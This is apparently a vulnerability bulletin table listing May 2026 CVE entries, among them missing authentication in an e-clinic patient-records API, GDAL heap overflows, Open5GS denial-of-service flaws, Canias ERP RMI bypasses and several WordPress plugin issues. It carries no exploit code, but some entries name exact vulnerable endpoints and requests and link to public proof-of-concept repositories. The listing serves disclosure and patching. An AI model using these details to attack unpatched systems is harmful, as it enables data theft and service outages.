| PicoTronica--e-Clinic Healthcare System ECHS | A vulnerability was detected in PicoTronica e-Clinic Healthcare System ECHS 5.7. The affected element is an unknown function of the file /cdemos/echs/api/v2/patient-records of the component API Endpoint. The manipulation results in missing authentication. The attack can be executed remotely. The exploit is now public and may be used. Upgrading to version 5.7.1 is sufficient to fix this issue. You should upgrade the affected component. The vendor was contacted early, responded in a very professional manner and quickly released a fixed version of the affected product. | 2026-05-06 | 5.3 | CVE-2026-8031 | VDB-361357 | PicoTronica e-Clinic Healthcare System ECHS API Endpoint patient-records missing authentication VDB-361357 | CTI Indicators (IOB, IOC, IOA) Submit #800781 | PicoTronica e-Clinic Healthcare System (ECHS) v5.7 Exposure of Private Personal Information to an Unauthorized Actor https://docs.google.com/document/d/1FByC9x21c5503cQg6lkxjffIwWlEAHtHi_83vk2eUdk/edit?usp=sharing |
| PicoTronica--e-Clinic Healthcare System ECHS | A vulnerability has been found in PicoTronica e-Clinic Healthcare System ECHS 5.7. This affects an unknown function of the file /cdemos/echs/api/v2/ of the component Response Header Handler. Such manipulation leads to information disclosure. The attack may be performed from remote. The exploit has been disclosed to the public and may be used. Upgrading to version 5.7.1 mitigates this issue. It is suggested to upgrade the affected component. The vendor was contacted early, responded in a very professional manner and quickly released a fixed version of the affected product. | 2026-05-06 | 5.3 | CVE-2026-8033 | VDB-361359 | PicoTronica e-Clinic Healthcare System ECHS Response Header v2 information disclosure VDB-361359 | CTI Indicators (IOB, IOC, TTP, IOA) Submit #800793 | PicoTronica e-Clinic Healthcare System (ECHS) v5.7 Information Disclosure https://docs.google.com/document/d/1dBJAAYyNpktnOBSCJPJGUMdfjb-Vj3PTy5oNj8RjeQ8/edit?usp=sharing |
| OSGeo--gdal | A vulnerability was identified in OSGeo gdal up to 3.13.0dev-4. This issue affects the function SWnentries of the file frmts/hdf4/hdf-eos/SWapi.c. Such manipulation of the argument DimensionName leads to heap-based buffer overflow. The attack must be carried out locally. The exploit is publicly available and might be used. Upgrading to version 3.12.4RC1 is capable of addressing this issue. The name of the patch is 9491e794f1757f08063ea2f7a274ad2994afa636. It is advisable to upgrade the affected component. | 2026-05-07 | 5.3 | CVE-2026-8086 | VDB-361839 | OSGeo gdal SWapi.c SWnentries heap-based overflow VDB-361839 | CTI Indicators (IOB, IOC, IOA) Submit #808038 | OSGeo GDAL 3.13.0dev Heap-based Buffer Overflow https://github.com/OSGeo/gdal/issues/14356 https://github.com/OSGeo/gdal/pull/14361 https://github.com/biniamf/pocs/tree/main/gdal-swinqdims_bof https://github.com/OSGeo/gdal/commit/9491e794f1757f08063ea2f7a274ad2994afa636 https://github.com/OSGeo/gdal/releases/tag/v3.12.4RC1 https://github.com/OSGeo/gdal/ |
| OSGeo--gdal | A security flaw has been discovered in OSGeo gdal up to 3.13.0dev-4. Impacted is the function GDnentries of the file frmts/hdf4/hdf-eos/GDapi.c. Performing a manipulation of the argument DataFieldName results in heap-based buffer overflow. The attack must be initiated from a local position. The exploit has been released to the public and may be used for attacks. Upgrading to version 3.13.0RC1 is recommended to address this issue. The patch is named 184f77dbcc74118c062c05e464c88161d3c37b9b. You should upgrade the affected component. | 2026-05-07 | 5.3 | CVE-2026-8087 | VDB-361840 | OSGeo gdal GDapi.c GDnentries heap-based overflow VDB-361840 | CTI Indicators (IOB, IOC, IOA) Submit #808039 | OSGeo GDAL 3.13.0dev Heap-based Buffer Overflow https://github.com/OSGeo/gdal/issues/14363 https://github.com/biniamf/pocs/tree/main/gdal-gdinqfields_bof https://github.com/OSGeo/gdal/commit/184f77dbcc74118c062c05e464c88161d3c37b9b https://github.com/OSGeo/gdal/releases/tag/v3.13.0RC1 https://github.com/OSGeo/gdal/ |
| gyoridavid--short-video-maker | A security flaw has been discovered in gyoridavid short-video-maker up to 1.3.4. This affects an unknown part of the file src/server/routers/rest.ts of the component REST API. The manipulation of the argument req.params.tmpFile results in path traversal. The attack can be launched remotely. The exploit has been released to the public and may be used for attacks. The project was informed of the problem early through an issue report but has not responded yet. | 2026-05-07 | 5.3 | CVE-2026-8115 | VDB-361903 | gyoridavid short-video-maker REST API rest.ts path traversal VDB-361903 | CTI Indicators (IOB, IOC, TTP, IOA) Submit #808258 | gyoridavid short-video-maker 1.3.4 Path Traversal https://github.com/gyoridavid/short-video-maker/issues/73 https://github.com/gyoridavid/short-video-maker/ |
| n/a--Open5GS | A vulnerability was detected in Open5GS up to 2.7.7. This affects the function ogs_sbi_client_send_via_scp_or_sepp in the library lib/sbi/client.c of the component NF. Performing a manipulation results in out-of-bounds read. The attack can be carried out remotely. The patch is named d5bc487fcf9ea87d2b03f2ef95123af344773bfb. It is suggested to install a patch to address this issue. | 2026-05-09 | 5.3 | CVE-2026-8186 | VDB-362338 | Open5GS NF client.c ogs_sbi_client_send_via_scp_or_sepp out-of-bounds VDB-362338 | CTI Indicators (IOB, IOC, IOA) Submit #800024 | Open5GS 2.7.7 Out-of-bounds Read (CWE-125) / Denial of Service (CWE-400) https://github.com/open5gs/open5gs/issues/4491 https://github.com/open5gs/open5gs/pull/4496 https://github.com/open5gs/open5gs/commit/d5bc487fcf9ea87d2b03f2ef95123af344773bfb https://github.com/open5gs/open5gs/ |
| n/a--Open5GS | A flaw has been found in Open5GS up to 2.7.7. This impacts the function _gtpv1_u_recv_cb of the file src/upf/gtp-path.c of the component UPF. Executing a manipulation can lead to resource consumption. The attack may be performed from remote. The project was informed of the problem early through an issue report but has not responded yet. | 2026-05-09 | 5.3 | CVE-2026-8187 | VDB-362339 | Open5GS UPF gtp-path.c _gtpv1_u_recv_cb resource consumption VDB-362339 | CTI Indicators (IOB, IOC, TTP, IOA) Submit #800025 | Open5GS 2.7.7 Denial of Service (DoS) (CWE-400) https://github.com/open5gs/open5gs/issues/4492 https://github.com/open5gs/open5gs/ |
| logtivity--Activity Logs, User Activity Tracking, Multisite Activity Log from Logtivity | The Activity Logs, User Activity Tracking, Multisite Activity Log from Logtivity plugin for WordPress is vulnerable to Authentication Bypass to Information Disclosure in versions up to, and including, 3.3.6. This is due to a logic flaw in the verifyAuthorization method where requests without an Authorization header skip Bearer token validation and fall through to an unconditional return true statement, bypassing all authentication checks. This makes it possible for unauthenticated attackers to access the /wp-json/logtivity/v1/options REST API endpoint and retrieve all plugin configuration options, including the logtivity_site_api_key which can be used to impersonate the site in API calls to the Logtivity service. | 2026-05-09 | 5.3 | CVE-2026-8198 | https://www.wordfence.com/threat-intel/vulnerabilities/id/65ca20b0-0831-4f60-9021-679be6c145ef?source=cve https://plugins.trac.wordpress.org/browser/logtivity/tags/3.3.7/Core/Services/Logtivity_Rest_Endpoints.php#L78 https://plugins.trac.wordpress.org/browser/logtivity/tags/3.3.7/Core/Services/Logtivity_Rest_Endpoints.php#L47 https://plugins.trac.wordpress.org/browser/logtivity/tags/3.3.6/Core/Services/Logtivity_Rest_Endpoints.php#L78 https://plugins.trac.wordpress.org/browser/logtivity/tags/3.3.6/Core/Services/Logtivity_Rest_Endpoints.php#L47 https://plugins.trac.wordpress.org/changeset/3507386/ |
| aandrew-me--tgpt | A security vulnerability has been detected in aandrew-me tgpt up to 2.11.1 on Linux/macOS. Affected by this vulnerability is the function helper.Update of the file helper.go of the component Update Handler. The manipulation leads to command injection. Local access is required to approach this attack. The exploit has been disclosed publicly and may be used. The vendor was contacted early about this disclosure but did not respond in any way. | 2026-05-09 | 5.3 | CVE-2026-8210 | VDB-362418 | aandrew-me tgpt Update helper.go helper.Update command injection VDB-362418 | CTI Indicators (IOB, IOC, TTP, IOA) Submit #803594 | aandrew-me tgpt v2.11.1 Command Injection https://drive.google.com/file/d/19wRsehbhotZXgE1TjenFtS3w-zRtp-PW/view?usp=sharing |
| OSGeo--gdal | A flaw has been found in OSGeo gdal up to 3.13.0dev-4. Affected by this vulnerability is the function SWSDfldsrch of the file frmts/hdf4/hdf-eos/SWapi.c. Executing a manipulation can lead to heap-based buffer overflow. The attack requires local access. The exploit has been published and may be used. Upgrading to version 3.13.0RC1 addresses this issue. This patch is called 3e04c0385630e4d42517046d9a4967dfccfeb7fd. The affected component should be upgraded. | 2026-05-09 | 5.3 | CVE-2026-8212 | VDB-362429 | OSGeo gdal SWapi.c SWSDfldsrch heap-based overflow VDB-362429 | CTI Indicators (IOB, IOC, IOA) Submit #808127 | OSGeo GDAL 3.13.0dev Out-of-Bounds Read https://github.com/OSGeo/gdal/issues/14398 https://github.com/biniamf/pocs/tree/main/gdal-swsdfldsrch_oob-read https://github.com/OSGeo/gdal/commit/3e04c0385630e4d42517046d9a4967dfccfeb7fd https://github.com/OSGeo/gdal/releases/tag/v3.13.0RC1 https://github.com/OSGeo/gdal/ |
| OSGeo--gdal | A vulnerability has been found in OSGeo gdal up to 3.13.0dev-4. Affected by this issue is the function GDSDfldsrch of the file frmts/hdf4/hdf-eos/GDapi.c of the component Grid File Handler. The manipulation leads to heap-based buffer overflow. An attack has to be approached locally. The exploit has been disclosed to the public and may be used. Upgrading to version 3.13.0RC1 can resolve this issue. The identifier of the patch is 3e04c0385630e4d42517046d9a4967dfccfeb7fd. It is suggested to upgrade the affected component. | 2026-05-09 | 5.3 | CVE-2026-8213 | VDB-362430 | OSGeo gdal Grid File GDapi.c GDSDfldsrch heap-based overflow VDB-362430 | CTI Indicators (IOB, IOC, IOA) Submit #808128 | OSGeo GDAL 3.13.0dev Out-of-Bounds Read https://github.com/OSGeo/gdal/issues/14399 https://github.com/biniamf/pocs/tree/main/gdal-gdsdfldsrch_oob-read https://github.com/OSGeo/gdal/commit/3e04c0385630e4d42517046d9a4967dfccfeb7fd https://github.com/OSGeo/gdal/releases/tag/v3.13.0RC1 https://github.com/OSGeo/gdal/ |
| Industrial Application Software IAS--Canias ERP | A vulnerability was found in Industrial Application Software IAS Canias ERP 8.03. This affects the function doAction of the component RMI Interface. The manipulation of the argument sessionId results in improper authentication. It is possible to launch the attack remotely. The exploit has been made public and could be used. The vendor was contacted early about this disclosure but did not respond in any way. | 2026-05-10 | 5.3 | CVE-2026-8214 | VDB-362431 | Industrial Application Software IAS Canias ERP RMI doAction improper authentication VDB-362431 | CTI Indicators (IOB, IOC, IOA) Submit #808238 | Industrial Application Software - IAS Canias ERP 8.03-- Information Disclosure https://hawktrace.com/blog/caniaserp/ https://gist.github.com/0xb1lal/3ef872a445310c5866d07d6a5b1803fa |
| Industrial Application Software IAS--Canias ERP | A vulnerability was determined in Industrial Application Software IAS Canias ERP 8.03. This vulnerability affects the function iasRequestFileEvent of the component RMI Interface. This manipulation of the argument m_strSourceFileName causes path traversal. The attack can be initiated remotely. The exploit has been publicly disclosed and may be utilized. The vendor was contacted early about this disclosure but did not respond in any way. | 2026-05-10 | 5.3 | CVE-2026-8215 | VDB-362432 | Industrial Application Software IAS Canias ERP RMI iasRequestFileEvent path traversal VDB-362432 | CTI Indicators (IOB, IOC, TTP, IOA) Submit #808242 | Industrial Application Software - IAS Canias ERP 8.03-- Directory traversal / Arbitrary file read https://hawktrace.com/blog/caniaserp/ https://gist.github.com/0xb1lal/3885c69998516685e3ea833403b9db2b |
| n/a--Open5GS | A vulnerability has been found in Open5GS up to 2.7.7. Affected is the function pcf_nbsf_management_handle_register of the file src/pcf/nbsf-handler.c of the component sm-policies Endpoint. Such manipulation leads to denial of service. The attack may be performed from remote. The exploit has been disclosed to the public and may be used. The project was informed of the problem early through an issue report but has not responded yet. | 2026-05-10 | 5.3 | CVE-2026-8222 | VDB-362439 | Open5GS sm-policies Endpoint nbsf-handler.c pcf_nbsf_management_handle_register denial of service VDB-362439 | CTI Indicators (IOB, IOC, TTP, IOA) Submit #808427 | Open5gs PCF v2.7.7 Denial of Service https://github.com/open5gs/open5gs/issues/4437 https://github.com/open5gs/open5gs/ |
| n/a--Open5GS | A vulnerability was found in Open5GS up to 2.7.7. Affected by this vulnerability is the function pcf_sess_sbi_discover_and_send of the component sm-policies Endpoint. Performing a manipulation results in denial of service. It is possible to initiate the attack remotely. The exploit has been made public and could be used. The project was informed of the problem early through an issue report but has not responded yet. | 2026-05-10 | 5.3 | CVE-2026-8223 VDB-362440 Open5GS sm-policies Endpoint pcf_sess_sbi_discover_and_send denial of service VDB-362440 CTI Indicators (IOB, IOC, TTP, IOA) Submit #808442 Open5gs PCF v2.7.7 Denial of Service https://github.com/open5gs/open5gs/issues/4438 https://github.com/open5gs/open5gs/ |
| n/a--Open5GS | A vulnerability was determined in Open5GS up to 2.7.7. Affected by this issue is the function pcf_sess_set_ipv6prefix of the file /src/pcf/context.c of the component PCF. Executing a manipulation of the argument SmPolicyContextData.ipv6AddressPrefix can lead to denial of service. It is possible to launch the attack remotely. The exploit has been publicly disclosed and may be utilized. The vendor was contacted early about this disclosure but did not respond in any way. | 2026-05-10 | 5.3 | CVE-2026-8224 VDB-362441 Open5GS PCF context.c pcf_sess_set_ipv6prefix denial of service VDB-362441 CTI Indicators (IOB, IOC, TTP, IOA) Submit #808443 Open5gs PCF v2.7.7 Denial of Service https://github.com/open5gs/open5gs/issues/4439 https://github.com/open5gs/open5gs/ |
| n/a--Open5GS | A vulnerability was identified in Open5GS up to 2.7.7. This affects the function pcf_npcf_smpolicycontrol_handle_delete of the file src/pcf/sm-sm.c of the component delete Endpoint. The manipulation leads to denial of service. The attack can be initiated remotely. The exploit is publicly available and might be used. The project was informed of the problem early through an issue report but has not responded yet. | 2026-05-10 | 5.3 | CVE-2026-8225 VDB-362442 Open5GS delete Endpoint sm-sm.c pcf_npcf_smpolicycontrol_handle_delete denial of service VDB-362442 CTI Indicators (IOB, IOC, TTP, IOA) Submit #808444 Open5gs PCF v2.7.7 Denial of Service https://github.com/open5gs/open5gs/issues/4440 https://github.com/open5gs/open5gs/ |
| n/a--Open5GS | A security flaw has been discovered in Open5GS up to 2.7.7. This vulnerability affects the function ogs_pcc_rule_install_flow_from_media in the library /lib/proto/types.c. The manipulation results in denial of service. The attack can be launched remotely. The exploit has been released to the public and may be used for attacks. The project was informed of the problem early through an issue report but has not responded yet. | 2026-05-10 | 5.3 | CVE-2026-8226 VDB-362443 Open5GS types.c ogs_pcc_rule_install_flow_from_media denial of service VDB-362443 CTI Indicators (IOB, IOC, TTP, IOA) Submit #808445 Open5gs PCF v2.7.7 Denial of Service https://github.com/open5gs/open5gs/issues/4441 https://github.com/open5gs/open5gs/ |
| 8421bit--MiniClaw | A vulnerability was detected in 8421bit MiniClaw 0.8.0/0.9.0. This issue affects the function resolveSkillScriptPath of the file src/kernel.ts of the component System Command Handler. The manipulation results in os command injection. The exploit is now public and may be used. The patch is identified as 223c16a1088e138838dcbd18cd65a37c35ac5a84. It is best practice to apply a patch to resolve this issue. | 2026-05-10 | 5.5 | CVE-2026-8235 VDB-362455 8421bit MiniClaw System kernel.ts resolveSkillScriptPath os command injection VDB-362455 CTI Indicators (IOB, IOC, TTP, IOA) Submit #809001 8421bit MiniClaw 0 OS Command Injection https://github.com/8421bit/MiniClaw/issues/6 https://github.com/8421bit/MiniClaw/pull/7 https://github.com/8421bit/MiniClaw/issues/6#issue-4290453729 https://github.com/8421bit/MiniClaw/commit/223c16a1088e138838dcbd18cd65a37c35ac5a84 https://github.com/8421bit/MiniClaw/ |
| Industrial Application Software IAS--Canias ERP | A vulnerability has been found in Industrial Application Software IAS Canias ERP 8.03. The affected element is the function iasGetServerInfoEvent of the component RMI Interface. Such manipulation leads to improper authorization. The attack can be executed remotely. The exploit has been disclosed to the public and may be used. The vendor was contacted early about this disclosure but did not respond in any way. | 2026-05-10 | 5.3 | CVE-2026-8241 VDB-362457 Industrial Application Software IAS Canias ERP RMI iasGetServerInfoEvent improper authorization VDB-362457 CTI Indicators (IOB, IOC, TTP, IOA) Submit #808270 Industrial Application Software - IAS Canias ERP 8.03-- Exposure of Sensitive Information to an Unauthorized Actor https://hawktrace.com/blog/caniaserp https://gist.github.com/0xb1lal/6f3f050f08cff569ecbde586e63c6bea |
| Industrial Application Software IAS--Canias ERP | A vulnerability was determined in Industrial Application Software IAS Canias ERP 8.03. This affects an unknown function of the component JNLP Deployment Endpoint. Executing a manipulation can lead to use of hard-coded cryptographic key. The attack may be performed from remote. The vendor was contacted early about this disclosure but did not respond in any way. | 2026-05-10 | 5.3 | CVE-2026-8243 VDB-362459 Industrial Application Software IAS Canias ERP JNLP Deployment Endpoint hard-coded key VDB-362459 CTI Indicators (IOB, IOC, TTP) Submit #808296 Industrial Application Software - IAS Canias ERP 8.03-- Use of Hard-coded Cryptographic Key (CWE-321) |
| Industrial Application Software IAS--Canias ERP | A vulnerability was identified in Industrial Application Software IAS Canias ERP 8.03. This impacts an unknown function of the component Login RMI Interface. The manipulation of the argument clientVersion leads to improper authentication. It is possible to initiate the attack remotely. The exploit is publicly available and might be used. The vendor was contacted early about this disclosure but did not respond in any way. | 2026-05-10 | 5.3 | CVE-2026-8244 VDB-362460 Industrial Application Software IAS Canias ERP Login RMI improper authentication VDB-362460 CTI Indicators (IOB, IOC, IOA) Submit #808326 Industrial Application Software - IAS Canias ERP 8.03-- Improper Authentication (CWE-287), (CWE-200) https://gist.github.com/0xb1lal/758bbc5e4d82efea248e675da934ac69 |
| Opencart--OpenCart | OpenCart 3.0.3.7 contains a cross-site request forgery vulnerability that allows attackers to change user passwords by sending crafted requests to the account/password endpoint. Attackers can trick authenticated users into submitting hidden forms with new password values in the 'password' and 'confirm' parameters to hijack accounts. | 2026-05-10 | 4.3 | CVE-2021-47953 ExploitDB-49970 VulnCheck Advisory: OpenCart 3.0.3.7 Cross-Site Request Forgery via account/password |
| curtain--Curtain | WordPress Plugin Curtain 1.0.2 contains a cross-site request forgery vulnerability that allows attackers to activate or deactivate site maintenance mode by crafting malicious requests. Attackers can trick authenticated administrators into submitting forged requests to the options-general.php page with curtain parameters to toggle maintenance mode without valid nonce validation. | 2026-05-10 | 4.3 | CVE-2022-50955 ExploitDB-50842 Official Product Homepage VulnCheck Advisory: WordPress Plugin Curtain 1.0.2 Cross-site Request Forgery |
| HCL Software--BigFix Service Management (SM) | HCL BigFix Service Management (SM) is vulnerable to insufficiently protected credentials for a short duration while communicating with a backend, internal application, which could allow an attacker to potentially misuse them if exfiltrated. | 2026-05-06 | 4.8 | CVE-2025-31976 https://support.hcl-software.com/csm?id=kb_article&sysparm_article=KB0128144 |
| HCL Software--BigFix Service Management (SM) | HCL BigFix Service Management (SM) does not adequately sanitize or safely render spreadsheet files (CSV, XLS, XLSX) before processing or distributing them. An attacker could populate data fields which, when saved to a CSV file, may attempt information exfiltration or other malicious activity when automatically executed by the spreadsheet software. Note that current versions of Excel warn users of untrusted content. | 2026-05-06 | 4.6 | CVE-2025-31978 https://support.hcl-software.com/csm?id=kb_article&sysparm_article=KB0128144 |
| HCL--BigFix Service Management (SM) | HCL BigFix Service Management (SM) is affected by the use of a vulnerable WSGI server. Deploying an outdated or insecure WSGI server may expose the application to known security weaknesses, potentially increasing the risk of exploitation and unauthorized access. | 2026-05-06 | 4.6 | CVE-2025-52613 https://support.hcl-software.com/csm?id=kb_article&sysparm_article=KB0128144 |
| timwhitlock--Loco Translate | The Loco Translate plugin for WordPress is vulnerable to Path Traversal in all versions up to, and including, 2.8.2 via the `fsReference` AJAX route. This is due to the `findSourceFile()` method normalizing user-supplied `ref` paths containing `../` directory traversal sequences without validating that the resolved path remains within the intended bundle or content directory. This makes it possible for authenticated attackers, with Translator-level access and above (custom `loco_admin` capability required, granted to the `translator` role and administrators by default), to read arbitrary `.php`, `.js`, `.json`, and `.twig` files from the server filesystem outside the intended translation directory. Files named wp-config.php are excluded. | 2026-05-05 | 4.9 | CVE-2026-1921 https://www.wordfence.com/threat-intel/vulnerabilities/id/f9ff3058-a08c-40ed-b756-81e703b2277a?source=cve https://plugins.trac.wordpress.org/browser/loco-translate/tags/2.8.1/src/ajax/FsReferenceController.php#L12 https://plugins.trac.wordpress.org/browser/loco-translate/trunk/src/ajax/FsReferenceController.php#L12 https://plugins.trac.wordpress.org/browser/loco-translate/tags/2.8.1/src/ajax/FsReferenceController.php#L92 https://plugins.trac.wordpress.org/browser/loco-translate/trunk/src/ajax/FsReferenceController.php#L92 https://plugins.trac.wordpress.org/changeset/3482475/loco-translate/trunk/tpl/admin/config/version.php https://plugins.trac.wordpress.org/changeset?old_path=%2Floco-translate/tags/2.8.2&new_path=%2Floco-translate/tags/2.8.3 |
| Cisco--Cisco Enterprise Chat and Email | A vulnerability in the Lite Agent feature of Cisco Enterprise Chat and Email (ECE) could allow an authenticated, remote attacker to conduct browser-based attacks. To exploit this vulnerability, the attacker must have valid credentials for a user account with at least the role of Agent. This vulnerability is due to inadequate validation of file contents during file upload operations. An attacker could exploit this vulnerability by uploading a file that contains malicious scripts or HTML code, which the application could make available to other users to access. A successful exploit could allow the attacker to execute the contents of that file in the browser of a user and conduct browser-based attacks. | 2026-05-06 | 4.3 | CVE-2026-20172 cisco-sa-ece-lite-agent-BCgSN8eb |
| Cisco--Cisco Prime Infrastructure | A vulnerability in the log file download functionality of Cisco Prime Infrastructure could allow an authenticated, remote attacker to download arbitrary log files from the server. This vulnerability is due to insufficient authorization checks on the download service API. An attacker could exploit this vulnerability by submitting a crafted URL request to an affected device. A successful exploit could allow the attacker to download sensitive log files that they would otherwise not have authorization to access. To exploit this vulnerability, the attacker must have valid credentials to access the web-based management interface of the affected device. | 2026-05-06 | 4.3 | CVE-2026-20189 cisco-sa-pi-unauth-infodiscl-LFnLgmey |
| Cisco--Cisco Identity Services Engine Software | A vulnerability in the RADIUS Policy API endpoints of Cisco ISE could allow an authenticated, remote attacker with read-only Administrator privileges to gain unauthorized access to sensitive information on an affected device. This vulnerability is due to improper role-based access control (RBAC) permissions on the RADIUS Policy API endpoints. An attacker could exploit this vulnerability by bypassing the web-based management interface and directly calling an affected endpoint. A successful exploit could allow the attacker to gain unauthorized read access to sensitive RADIUS Policy details that are restricted for their role. | 2026-05-06 | 4.3 | CVE-2026-20193 cisco-sa-ise-unauth-bypass-uxjRXGpb |
| techjewel--Ninja Tables Easy Data Table Builder | The Ninja Tables - Easy Data Table Builder plugin for WordPress is vulnerable to unauthorized database table creation due to missing authorization checks on the `createFluentCartTable` function in all versions up to, and including, 5.2.6. This makes it possible for authenticated attackers, with Subscriber-level access and above, to create arbitrary Ninja Tables in the database which can lead to database pollution and resource exhaustion. | 2026-05-06 | 4.3 | CVE-2026-2306 https://www.wordfence.com/threat-intel/vulnerabilities/id/592d42eb-4025-44af-a519-672656ad8b0e?source=cve https://plugins.trac.wordpress.org/browser/ninja-tables/trunk/app/Modules/FluentCart/Handlers/FluentCartHandler.php#L44 https://plugins.trac.wordpress.org/browser/ninja-tables/tags/5.2.6/app/Modules/FluentCart/Handlers/FluentCartHandler.php#L44 https://plugins.trac.wordpress.org/browser/ninja-tables/trunk/app/Modules/FluentCart/FluentCartModule.php#L23 https://plugins.trac.wordpress.org/browser/ninja-tables/tags/5.2.6/app/Modules/FluentCart/FluentCartModule.php#L23 https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&new=3453522%40ninja-tables%2Ftrunk&old=3447894%40ninja-tables%2Ftrunk&sfp_email=&sfph_mail= |
| PluginUs.Net--BEAR | Cross-Site Request Forgery (CSRF) vulnerability in PluginUs.Net BEAR allows Cross Site Request Forgery. This issue affects BEAR: from n/a through 1.1.5. | 2026-05-07 | 4.3 | CVE-2026-27415 https://patchstack.com/database/wordpress/plugin/woo-bulk-editor/vulnerability/wordpress-bear-plugin-1-1-5-cross-site-request-forgery-csrf-vulnerability?_s_id=cve |
| Oracle Corporation--Oracle Macaron Tool of Oracle Open Source Projects | Vulnerability in the Oracle Macaron Tool product of Oracle Open Source Projects. The supported version that is affected is v0.22.0. Easily exploitable vulnerability allows unauthenticated attacker with network access via HTTP to compromise Oracle Macaron Tool. Successful attacks of this vulnerability can result in Oracle Macaron Tool failing host address validation. | 2026-05-06 | 4.7 | CVE-2026-35253 Oracle Advisory |
| wpeverest--User Registration & Membership Free & Paid Memberships, Subscriptions, Content Restriction, User Profile, Custom User Registration & Login Builder | The User Registration & Membership plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on the `embed_form_action()` function in all versions up to, and including, 5.1.4. This makes it possible for authenticated attackers, with Contributor-level access and above, to append shortcode content to arbitrary pages they do not own or have permission to edit. | 2026-05-05 | 4.3 | CVE-2026-3601 https://www.wordfence.com/threat-intel/vulnerabilities/id/c8798fb2-4cab-4960-9e32-fd74bb4a5091?source=cve https://plugins.trac.wordpress.org/browser/user-registration/trunk/includes/class-ur-ajax.php#L1003 https://plugins.trac.wordpress.org/browser/user-registration/tags/5.1.2/includes/class-ur-ajax.php#L1003 https://plugins.trac.wordpress.org/browser/user-registration/trunk/includes/admin/class-ur-admin-assets.php#L370 https://plugins.trac.wordpress.org/browser/user-registration/tags/5.1.2/includes/admin/class-ur-admin-assets.php#L370 https://plugins.trac.wordpress.org/changeset/3485702/user-registration/trunk/includes/class-ur-ajax.php?contextall=1 |
| Spring--Spring Cloud Config | When enabling trace logging in Spring Cloud Config Server, sensitive information was placed in plain text in the logs. Spring Cloud Config 3.1.x: affected from 3.1.0 through 3.1.13 (inclusive); upgrade to 3.1.14 or greater (Enterprise Support Only). Spring Cloud Config 4.1.x: affected from 4.1.0 through 4.1.9 (inclusive); upgrade to 4.1.10 or greater (Enterprise Support Only). Spring Cloud Config 4.2.x: affected from 4.2.0 through 4.2.6 (inclusive); upgrade to 4.2.7 or greater (Enterprise Support Only). Spring Cloud Config 4.3.x: affected from 4.3.0 through 4.3.2 (inclusive); upgrade to 4.3.3 or greater. Spring Cloud Config 5.0.x: affected from 5.0.0 through 5.0.2 (inclusive); upgrade to 5.0.3 or greater. | 2026-05-07 | 4.4 | CVE-2026-41004 https://spring.io/security/cve-2026-41004 |
| go-git--go-git | go-git is an extensible git implementation library written in pure Go. Prior to versions 5.18.0 and 6.0.0-alpha.2, go-git may leak HTTP authentication credentials when following redirects during smart-HTTP clone and fetch operations. This issue has been patched in versions 5.18.0 and 6.0.0-alpha.2. | 2026-05-08 | 4.7 | CVE-2026-41506 https://github.com/go-git/go-git/security/advisories/GHSA-3xc5-wrhm-f963 https://github.com/go-git/go-git/releases/tag/v5.18.0 https://github.com/go-git/go-git/releases/tag/v6.0.0-alpha.2 |
| WeblateOrg--weblate | Weblate is a web based localization tool. Prior to version 5.17.1, when a user changes their password, browser sessions are correctly invalidated via "cycle_session_keys()", but DRF API tokens ("wlu_*" prefix) stored in "authtoken_token" are not revoked. This issue has been patched in version 5.17.1. | 2026-05-07 | 4.2 | CVE-2026-41519 https://github.com/WeblateOrg/weblate/security/advisories/GHSA-6j8j-4qp3-36p2 https://github.com/WeblateOrg/weblate/pull/19057 https://github.com/WeblateOrg/weblate/commit/649a2da81700542f95c0807b3c625fc3bb0eaf95 https://github.com/WeblateOrg/weblate/releases/tag/weblate-5.17.1 |
| Admidio--admidio | Admidio is an open-source user management solution. Prior to version 5.0.9, the add mode in modules/documents-files.php accepts a name parameter validated only as 'string' type (HTML encoding), allowing path traversal characters (../) to pass through unfiltered. Combined with the absence of CSRF protection on this endpoint and SameSite=Lax session cookies, a low-privileged attacker can trick a documents administrator into clicking a crafted link that registers an arbitrary server file (e.g., install/config.php containing database credentials) into a documents folder accessible to the attacker. This issue has been patched in version 5.0.9. | 2026-05-07 | 4.5 | CVE-2026-41656 https://github.com/Admidio/admidio/security/advisories/GHSA-m9h6-8pqm-xrhf https://github.com/Admidio/admidio/releases/tag/v5.0.9 |
| Admidio--admidio | Admidio is an open-source user management solution. Prior to version 5.0.9, the contacts_data.php endpoint uses a weaker permission check (isAdministratorUsers(), requiring only rol_edit_user=true) than the frontend UI (contacts.php) which correctly requires the stronger isAdministrator() (requiring rol_administrator=true) and the contacts_show_all system setting. A user manager who is not a full administrator can directly request contacts_data.php?mem_show_filter=3 to retrieve all user records across all organizations in the Admidio instance, bypassing multi-tenant organization isolation. This issue has been patched in version 5.0.9. | 2026-05-07 | 4.9 | CVE-2026-41657 https://github.com/Admidio/admidio/security/advisories/GHSA-g8p8-94f2-28gr https://github.com/Admidio/admidio/releases/tag/v5.0.9 |
| lxc--incus | Incus is a system container and virtual machine manager. Prior to version 7.0.0, uploads of large amounts of data by authenticated users can run the Incus server out of disk space, potentially taking down the host system. The impact here is limited for anyone using storage.images_volume and storage.backups_volume as those users will have large uploads be stored on those volumes rather than directly on the host filesystem. This is the default behavior on IncusOS. This issue has been patched in version 7.0.0. | 2026-05-07 | 4.3 | CVE-2026-41685 https://github.com/lxc/incus/security/advisories/GHSA-98vh-x9cx-9cfp https://github.com/lxc/incus/releases/tag/v7.0.0 |
| ellite--Wallos | Wallos is an open-source, self-hostable personal subscription tracker. Prior to version 4.8.1, the SSRF protection in endpoints/subscription/add.php (line 42) and endpoints/payments/add.php (line 40) uses an inline IP validation check (FILTER_FLAG_NO_PRIV_RANGE | FILTER_FLAG_NO_RES_RANGE) that does not block CGNAT addresses (100.64.0.0/10, RFC 6598). The includes/ssrf_helper.php file explicitly defines is_cgnat_ip() to cover this gap (used by notification endpoints), but the logo/icon URL fetching in subscription and payment endpoints performs its own inline validation that misses this range. This allows authenticated users to perform Blind SSRF to internal services in Tailscale, Carrier-Grade NAT, and other environments using 100.64.0.0/10 addresses. This issue has been patched in version 4.8.1. | 2026-05-07 | 4.3 | CVE-2026-41687 https://github.com/ellite/Wallos/security/advisories/GHSA-4v59-hghw-7gc2 https://github.com/ellite/Wallos/commit/e79f28be6be0435fbc93563fb3c0e62206b48e85 https://github.com/ellite/Wallos/releases/tag/v4.8.1 |
